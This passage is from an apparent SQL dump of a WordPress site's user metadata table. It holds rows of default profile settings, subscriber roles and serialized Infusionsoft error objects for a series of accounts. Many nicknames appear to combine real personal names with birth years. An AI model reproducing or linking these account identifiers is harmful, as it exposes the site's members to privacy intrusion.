(41002, 3145, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41003, 3145, 'cyb_user_level', '0'),
(41004, 3145, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41005, 3145, 'default_password_nag', '1'),
(41016, 3146, 'cyb_user_level', '0'),
(41017, 3146, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41018, 3146, 'default_password_nag', '1'),
(41019, 3147, 'nickname', 'joshweiner911968'),
(41020, 3147, 'first_name', ''),
(41021, 3147, 'last_name', ''),
(41022, 3147, 'description', ''),
(41023, 3147, 'rich_editing', 'true'),
(41024, 3147, 'comment_shortcuts', 'false'),
(41025, 3147, 'admin_color', 'fresh'),
(41026, 3147, 'use_ssl', '0'),
(41027, 3147, 'show_admin_bar_front', 'true'),
(41028, 3147, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41029, 3147, 'cyb_user_level', '0'),
(41030, 3147, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41031, 3147, 'default_password_nag', '1'),
(41041, 3148, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41042, 3148, 'cyb_user_level', '0'),
(41043, 3148, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41044, 3148, 'default_password_nag', '1'),
(41045, 3149, 'nickname', 'alex.kwon1951'),
(41046, 3149, 'first_name', ''),
(41047, 3149, 'last_name', ''),
(41048, 3149, 'description', ''),
(41049, 3149, 'rich_editing', 'true'),
(41050, 3149, 'comment_shortcuts', 'false'),
(41051, 3149, 'admin_color', 'fresh'),
(41052, 3149, 'use_ssl', '0'),
(41053, 3149, 'show_admin_bar_front', 'true'),
(41054, 3149, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41055, 3149, 'cyb_user_level', '0'),
(41056, 3149, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41057, 3149, 'default_password_nag', '1'),
(41058, 3150, 'nickname', 'plusdigitalca1958'),
(41059, 3150, 'first_name', ''),
(41060, 3150, 'last_name', ''),
(41061, 3150, 'description', ''),
(41062, 3150, 'rich_editing', 'true'),
(41063, 3150, 'comment_shortcuts', 'false'),
(41064, 3150, 'admin_color', 'fresh'),
(41065, 3150, 'use_ssl', '0'),
(41066, 3150, 'show_admin_bar_front', 'true'),
(41067, 3150, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41068, 3150, 'cyb_user_level', '0'),
(41069, 3150, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41070, 3150, 'default_password_nag', '1'),
(41071, 3151, 'nickname', 'bspurgeon1965'),
(41072, 3151, 'first_name', ''),
(41073, 3151, 'last_name', ''),
(41074, 3151, 'description', ''),
(41075, 3151, 'rich_editing', 'true'),
(41076, 3151, 'comment_shortcuts', 'false'),
(41077, 3151, 'admin_color', 'fresh'),
(41078, 3151, 'use_ssl', '0'),
(41079, 3151, 'show_admin_bar_front', 'true'),
(41080, 3151, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41081, 3151, 'cyb_user_level', '0'),
(41082, 3151, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41083, 3151, 'default_password_nag', '1'),
(41084, 3152, 'nickname', 'dcapo251953'),
(41085, 3152, 'first_name', ''),
(41086, 3152, 'last_name', ''),
(41087, 3152, 'description', ''),
(41088, 3152, 'rich_editing', 'true'),
(41089, 3152, 'comment_shortcuts', 'false'),
(41090, 3152, 'admin_color', 'fresh'),
(41091, 3152, 'use_ssl', '0'),
(41092, 3152, 'show_admin_bar_front', 'true'),
(41093, 3152, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41094, 3152, 'cyb_user_level', '0'),
(41095, 3152, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41096, 3152, 'default_password_nag', '1'),
(41097, 3153, 'nickname', 'mareike_fritz1997'),
(41098, 3153, 'first_name', ''),
(41099, 3153, 'last_name', ''),
(41100, 3153, 'description', ''),
(41101, 3153, 'rich_editing', 'true'),
(41102, 3153, 'comment_shortcuts', 'false'),
(41103, 3153, 'admin_color', 'fresh'),
(41104, 3153, 'use_ssl', '0'),
(41105, 3153, 'show_admin_bar_front', 'true'),
(41106, 3153, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41107, 3153, 'cyb_user_level', '0'),
(41108, 3153, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41109, 3153, 'default_password_nag', '1'),
(41110, 3154, 'nickname', 'thornthor1987'),
(41111, 3154, 'first_name', ''),
(41112, 3154, 'last_name', ''),
(41113, 3154, 'description', ''),
(41114, 3154, 'rich_editing', 'true'),
(41115, 3154, 'comment_shortcuts', 'false'),
(41116, 3154, 'admin_color', 'fresh'),
(41117, 3154, 'use_ssl', '0'),
(41118, 3154, 'show_admin_bar_front', 'true'),
(41119, 3154, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41120, 3154, 'cyb_user_level', '0'),
(41121, 3154, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41122, 3154, 'default_password_nag', '1'),
(41123, 3155, 'nickname', 'reter221xx1986'),
(41124, 3155, 'first_name', ''),
(41125, 3155, 'last_name', ''),
(41126, 3155, 'description', ''),
(41127, 3155, 'rich_editing', 'true'),
(41128, 3155, 'comment_shortcuts', 'false'),
(41129, 3155, 'admin_color', 'fresh'),
(41130, 3155, 'use_ssl', '0'),
(41131, 3155, 'show_admin_bar_front', 'true'),
(41132, 3155, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41133, 3155, 'cyb_user_level', '0'),
(41134, 3155, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41135, 3155, 'default_password_nag', '1'),
(41136, 3156, 'nickname', 'wardy09022000'),
(41137, 3156, 'first_name', ''),
(41138, 3156, 'last_name', ''),
(41139, 3156, 'description', ''),
(41140, 3156, 'rich_editing', 'true'),
(41141, 3156, 'comment_shortcuts', 'false'),
(41142, 3156, 'admin_color', 'fresh'),
(41143, 3156, 'use_ssl', '0'),
(41144, 3156, 'show_admin_bar_front', 'true'),
(41145, 3156, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41146, 3156, 'cyb_user_level', '0'),
(41147, 3156, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41148, 3156, 'default_password_nag', '1'),
(41149, 3157, 'nickname', 'eaglefrk2009'),
(41150, 3157, 'first_name', ''),
(41151, 3157, 'last_name', ''),
(41152, 3157, 'description', ''),
(41153, 3157, 'rich_editing', 'true'),
(41154, 3157, 'comment_shortcuts', 'false'),
(41155, 3157, 'admin_color', 'fresh'),
(41156, 3157, 'use_ssl', '0'),
(41157, 3157, 'show_admin_bar_front', 'true'),
(41158, 3157, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41159, 3157, 'cyb_user_level', '0'),
(41160, 3157, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41161, 3157, 'default_password_nag', '1'),
(41162, 3158, 'nickname', 'timecadavis1973'),
(41163, 3158, 'first_name', ''),
(41164, 3158, 'last_name', ''),
(41165, 3158, 'description', ''),
(41166, 3158, 'rich_editing', 'true'),
(41167, 3158, 'comment_shortcuts', 'false'),
(41168, 3158, 'admin_color', 'fresh'),
(41169, 3158, 'use_ssl', '0'),
(41170, 3158, 'show_admin_bar_front', 'true'),
(41171, 3158, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41172, 3158, 'cyb_user_level', '0'),
(41173, 3158, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41174, 3158, 'default_password_nag', '1'),
(41175, 3159, 'nickname', 'kluna20051973'),
(41176, 3159, 'first_name', ''),
(41177, 3159, 'last_name', ''),
(41178, 3159, 'description', ''),
(41179, 3159, 'rich_editing', 'true'),
(41180, 3159, 'comment_shortcuts', 'false'),
(41181, 3159, 'admin_color', 'fresh'),
(41182, 3159, 'use_ssl', '0'),
(41183, 3159, 'show_admin_bar_front', 'true'),
(41184, 3159, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41185, 3159, 'cyb_user_level', '0'),
(41186, 3159, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41187, 3159, 'default_password_nag', '1'),
(41188, 3160, 'nickname', 'jal0771973'),
(41189, 3160, 'first_name', ''),
(41190, 3160, 'last_name', ''),
(41191, 3160, 'description', ''),
(41192, 3160, 'rich_editing', 'true'),
(41193, 3160, 'comment_shortcuts', 'false'),
(41194, 3160, 'admin_color', 'fresh'),
(41195, 3160, 'use_ssl', '0'),
(41196, 3160, 'show_admin_bar_front', 'true'),
(41197, 3160, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41198, 3160, 'cyb_user_level', '0'),
(41199, 3160, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41200, 3160, 'default_password_nag', '1'),
(41201, 3161, 'nickname', 'n.balanza2007'),
(41202, 3161, 'first_name', ''),
(41203, 3161, 'last_name', ''),
(41204, 3161, 'description', ''),
(41205, 3161, 'rich_editing', 'true'),
(41206, 3161, 'comment_shortcuts', 'false'),
(41207, 3161, 'admin_color', 'fresh'),
(41208, 3161, 'use_ssl', '0'),
(41209, 3161, 'show_admin_bar_front', 'true'),
(41210, 3161, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41211, 3161, 'cyb_user_level', '0'),
(41212, 3161, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41213, 3161, 'default_password_nag', '1'),
(41214, 3162, 'nickname', 'jnarciso03081975'),
(41215, 3162, 'first_name', ''),
(41216, 3162, 'last_name', ''),
(41217, 3162, 'description', ''),
(41218, 3162, 'rich_editing', 'true'),
(41219, 3162, 'comment_shortcuts', 'false'),
(41220, 3162, 'admin_color', 'fresh'),
(41221, 3162, 'use_ssl', '0'),
(41222, 3162, 'show_admin_bar_front', 'true'),
(41223, 3162, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41224, 3162, 'cyb_user_level', '0'),
(41225, 3162, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41226, 3162, 'default_password_nag', '1'),
(41227, 3163, 'nickname', 'fletcherholloway1952'),
(41228, 3163, 'first_name', ''),
(41229, 3163, 'last_name', ''),
(41230, 3163, 'description', ''),
(41231, 3163, 'rich_editing', 'true'),
(41232, 3163, 'comment_shortcuts', 'false'),
(41233, 3163, 'admin_color', 'fresh'),
(41234, 3163, 'use_ssl', '0'),
(41235, 3163, 'show_admin_bar_front', 'true'),
(41236, 3163, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41237, 3163, 'cyb_user_level', '0'),
(41238, 3163, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41239, 3163, 'default_password_nag', '1'),
(41240, 3164, 'nickname', 'jaimewdumont1954'),
(41241, 3164, 'first_name', ''),
(41242, 3164, 'last_name', ''),
(41243, 3164, 'description', ''),
(41244, 3164, 'rich_editing', 'true'),
(41245, 3164, 'comment_shortcuts', 'false'),
(41246, 3164, 'admin_color', 'fresh'),
(41247, 3164, 'use_ssl', '0'),
(41248, 3164, 'show_admin_bar_front', 'true'),
(41249, 3164, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41250, 3164, 'cyb_user_level', '0'),
(41251, 3164, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41252, 3164, 'default_password_nag', '1'),
(41253, 3165, 'nickname', 'sofya.pogreb1982'),
(41254, 3165, 'first_name', ''),
(41255, 3165, 'last_name', ''),
(41256, 3165, 'description', ''),
(41257, 3165, 'rich_editing', 'true'),
(41258, 3165, 'comment_shortcuts', 'false'),
(41259, 3165, 'admin_color', 'fresh'),
(41260, 3165, 'use_ssl', '0'),
(41261, 3165, 'show_admin_bar_front', 'true'),
(41262, 3165, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41263, 3165, 'cyb_user_level', '0'),
(41264, 3165, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41265, 3165, 'default_password_nag', '1'),
(41276, 3166, 'cyb_user_level', '0'),
(41277, 3166, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41278, 3166, 'default_password_nag', '1'),
(41279, 3167, 'nickname', 'skynyrdlynyrd2481950'),
(41280, 3167, 'first_name', ''),
(41281, 3167, 'last_name', ''),
(41282, 3167, 'description', ''),
(41283, 3167, 'rich_editing', 'true'),
(41284, 3167, 'comment_shortcuts', 'false'),
(41285, 3167, 'admin_color', 'fresh'),
(41286, 3167, 'use_ssl', '0'),
(41287, 3167, 'show_admin_bar_front', 'true'),
(41288, 3167, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41289, 3167, 'cyb_user_level', '0'),
(41290, 3167, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41291, 3167, 'default_password_nag', '1'),
(41292, 3168, 'nickname', 'weston.turner2001'),
(41293, 3168, 'first_name', ''),
(41294, 3168, 'last_name', ''),
(41295, 3168, 'description', ''),
(41296, 3168, 'rich_editing', 'true'),
(41297, 3168, 'comment_shortcuts', 'false'),
(41298, 3168, 'admin_color', 'fresh'),
(41299, 3168, 'use_ssl', '0'),
(41300, 3168, 'show_admin_bar_front', 'true'),
(41301, 3168, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41302, 3168, 'cyb_user_level', '0'),
(41303, 3168, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41304, 3168, 'default_password_nag', '1'),
(41305, 3169, 'nickname', 'tttrammell2010'),
(41306, 3169, 'first_name', ''),
(41307, 3169, 'last_name', ''),
(41308, 3169, 'description', ''),
(41309, 3169, 'rich_editing', 'true'),
(41310, 3169, 'comment_shortcuts', 'false'),
(41311, 3169, 'admin_color', 'fresh'),
(41312, 3169, 'use_ssl', '0'),
(41313, 3169, 'show_admin_bar_front', 'true'),
(41314, 3169, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41315, 3169, 'cyb_user_level', '0'),
(41316, 3169, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41317, 3169, 'default_password_nag', '1'),
(41318, 3170, 'nickname', 'hutin.charles2001'),
(41319, 3170, 'first_name', ''),
(41320, 3170, 'last_name', ''),
(41321, 3170, 'description', ''),
(41322, 3170, 'rich_editing', 'true'),
(41323, 3170, 'comment_shortcuts', 'false'),
(41324, 3170, 'admin_color', 'fresh'),
(41325, 3170, 'use_ssl', '0'),
(41326, 3170, 'show_admin_bar_front', 'true'),
(41327, 3170, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41328, 3170, 'cyb_user_level', '0'),
(41329, 3170, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41330, 3170, 'default_password_nag', '1'),
(41331, 3171, 'nickname', 'harrywynn1994'),
(41332, 3171, 'first_name', ''),
(41333, 3171, 'last_name', ''),
(41334, 3171, 'description', ''),
(41335, 3171, 'rich_editing', 'true'),
(41336, 3171, 'comment_shortcuts', 'false'),
(41337, 3171, 'admin_color', 'fresh'),
(41338, 3171, 'use_ssl', '0'),
(41339, 3171, 'show_admin_bar_front', 'true'),
(41340, 3171, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41341, 3171, 'cyb_user_level', '0'),
(41342, 3171, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41343, 3171, 'default_password_nag', '1'),
(41344, 3172, 'nickname', 'cique631960'),
(41345, 3172, 'first_name', ''),
(41346, 3172, 'last_name', ''),
(41347, 3172, 'description', ''),
(41348, 3172, 'rich_editing', 'true'),
(41349, 3172, 'comment_shortcuts', 'false'),
(41350, 3172, 'admin_color', 'fresh'),
(41351, 3172, 'use_ssl', '0'),
(41352, 3172, 'show_admin_bar_front', 'true'),
(41353, 3172, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41354, 3172, 'cyb_user_level', '0'),
(41355, 3172, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41356, 3172, 'default_password_nag', '1'),
(41357, 3173, 'nickname', 'chrisorobb1990'),
(41358, 3173, 'first_name', ''),
(41359, 3173, 'last_name', ''),
(41360, 3173, 'description', ''),
(41361, 3173, 'rich_editing', 'true'),
(41362, 3173, 'comment_shortcuts', 'false'),
(41363, 3173, 'admin_color', 'fresh'),
(41364, 3173, 'use_ssl', '0'),
(41365, 3173, 'show_admin_bar_front', 'true'),
(41366, 3173, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41367, 3173, 'cyb_user_level', '0'),
(41368, 3173, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41369, 3173, 'default_password_nag', '1'),
(41370, 3174, 'nickname', 'rballard1993'),
(41371, 3174, 'first_name', ''),
(41372, 3174, 'last_name', ''),
(41373, 3174, 'description', ''),
(41374, 3174, 'rich_editing', 'true'),
(41375, 3174, 'comment_shortcuts', 'false'),
(41376, 3174, 'admin_color', 'fresh'),
(41377, 3174, 'use_ssl', '0'),
(41378, 3174, 'show_admin_bar_front', 'true'),
(41379, 3174, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41380, 3174, 'cyb_user_level', '0'),
(41381, 3174, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41382, 3174, 'default_password_nag', '1'),
(41383, 3175, 'nickname', 'davdjenk1974'),
(41384, 3175, 'first_name', ''),
(41385, 3175, 'last_name', ''),
(41386, 3175, 'description', ''),
(41387, 3175, 'rich_editing', 'true'),
(41388, 3175, 'comment_shortcuts', 'false'),
(41389, 3175, 'admin_color', 'fresh'),
(41390, 3175, 'use_ssl', '0'),
(41391, 3175, 'show_admin_bar_front', 'true'),
(41392, 3175, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41393, 3175, 'cyb_user_level', '0'),
(41394, 3175, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41395, 3175, 'default_password_nag', '1'),
(41396, 3176, 'nickname', 'paulabosse1962'),
(41397, 3176, 'first_name', ''),
(41398, 3176, 'last_name', ''),
(41399, 3176, 'description', ''),
(41400, 3176, 'rich_editing', 'true'),
(41401, 3176, 'comment_shortcuts', 'false'),
(41402, 3176, 'admin_color', 'fresh'),
(41403, 3176, 'use_ssl', '0'),
(41404, 3176, 'show_admin_bar_front', 'true'),
(41405, 3176, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41406, 3176, 'cyb_user_level', '0');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(41407, 3176, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41408, 3176, 'default_password_nag', '1'),
(41409, 3177, 'nickname', 'focaman121989'),
(41410, 3177, 'first_name', ''),
(41411, 3177, 'last_name', ''),
(41412, 3177, 'description', ''),
(41413, 3177, 'rich_editing', 'true'),
(41414, 3177, 'comment_shortcuts', 'false'),
(41415, 3177, 'admin_color', 'fresh'),
(41416, 3177, 'use_ssl', '0'),
(41417, 3177, 'show_admin_bar_front', 'true'),
(41418, 3177, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41419, 3177, 'cyb_user_level', '0'),
(41420, 3177, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41421, 3177, 'default_password_nag', '1'),
(41422, 3178, 'nickname', 'adalbertomendez721950'),
(41423, 3178, 'first_name', ''),
(41424, 3178, 'last_name', ''),
(41425, 3178, 'description', ''),
(41426, 3178, 'rich_editing', 'true'),
(41427, 3178, 'comment_shortcuts', 'false'),
(41428, 3178, 'admin_color', 'fresh'),
(41429, 3178, 'use_ssl', '0'),
(41430, 3178, 'show_admin_bar_front', 'true'),
(41431, 3178, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41432, 3178, 'cyb_user_level', '0'),
(41433, 3178, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41434, 3178, 'default_password_nag', '1'),
(41435, 3179, 'nickname', 'chazo371960'),
(41436, 3179, 'first_name', ''),
(41437, 3179, 'last_name', ''),
(41438, 3179, 'description', ''),
(41439, 3179, 'rich_editing', 'true'),
(41440, 3179, 'comment_shortcuts', 'false'),
(41441, 3179, 'admin_color', 'fresh'),
(41442, 3179, 'use_ssl', '0'),
(41443, 3179, 'show_admin_bar_front', 'true'),
(41444, 3179, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41445, 3179, 'cyb_user_level', '0'),
(41446, 3179, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41447, 3179, 'default_password_nag', '1'),
(41448, 3180, 'nickname', 'kjordan11983'),
(41449, 3180, 'first_name', ''),
(41450, 3180, 'last_name', ''),
(41451, 3180, 'description', ''),
(41452, 3180, 'rich_editing', 'true'),
(41453, 3180, 'comment_shortcuts', 'false'),
(41454, 3180, 'admin_color', 'fresh'),
(41455, 3180, 'use_ssl', '0'),
(41456, 3180, 'show_admin_bar_front', 'true'),
(41457, 3180, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41458, 3180, 'cyb_user_level', '0'),
(41459, 3180, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41460, 3180, 'default_password_nag', '1'),
(41461, 3181, 'nickname', 'elizabeth.mihm11901990'),
(41462, 3181, 'first_name', ''),
(41463, 3181, 'last_name', ''),
(41464, 3181, 'description', ''),
(41465, 3181, 'rich_editing', 'true'),
(41466, 3181, 'comment_shortcuts', 'false'),
(41467, 3181, 'admin_color', 'fresh'),
(41468, 3181, 'use_ssl', '0'),
(41469, 3181, 'show_admin_bar_front', 'true'),
(41470, 3181, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41471, 3181, 'cyb_user_level', '0'),
(41472, 3181, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41473, 3181, 'default_password_nag', '1'),
(41474, 3182, 'nickname', 'vietecrx1985'),
(41475, 3182, 'first_name', ''),
(41476, 3182, 'last_name', ''),
(41477, 3182, 'description', ''),
(41478, 3182, 'rich_editing', 'true'),
(41479, 3182, 'comment_shortcuts', 'false'),
(41480, 3182, 'admin_color', 'fresh'),
(41481, 3182, 'use_ssl', '0'),
(41482, 3182, 'show_admin_bar_front', 'true'),
(41483, 3182, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41484, 3182, 'cyb_user_level', '0'),
(41485, 3182, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41486, 3182, 'default_password_nag', '1'),
(41487, 3183, 'nickname', 'lewis_jolene1990'),
(41488, 3183, 'first_name', ''),
(41489, 3183, 'last_name', ''),
(41490, 3183, 'description', ''),
(41491, 3183, 'rich_editing', 'true'),
(41492, 3183, 'comment_shortcuts', 'false'),
(41493, 3183, 'admin_color', 'fresh'),
(41494, 3183, 'use_ssl', '0'),
(41495, 3183, 'show_admin_bar_front', 'true'),
(41496, 3183, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41497, 3183, 'cyb_user_level', '0'),
(41498, 3183, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(41499, 3183, 'default_password_nag', '1'),
(41500, 3184, 'nickname', 'linanatachaa1971'),
(41501, 3184, 'first_name', ''),
(41502, 3184, 'last_name', ''),
(41503, 3184, 'description', ''),
(41504, 3184, 'rich_editing', 'true'),
(41505, 3184, 'comment_shortcuts', 'false'),
(41506, 3184, 'admin_color', 'fresh'),
(41507, 3184, 'use_ssl', '0'),
(41508, 3184, 'show_admin_bar_front', 'true'),
(41509, 3184, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(41510, 3184, 'cyb_user_level', '0'),
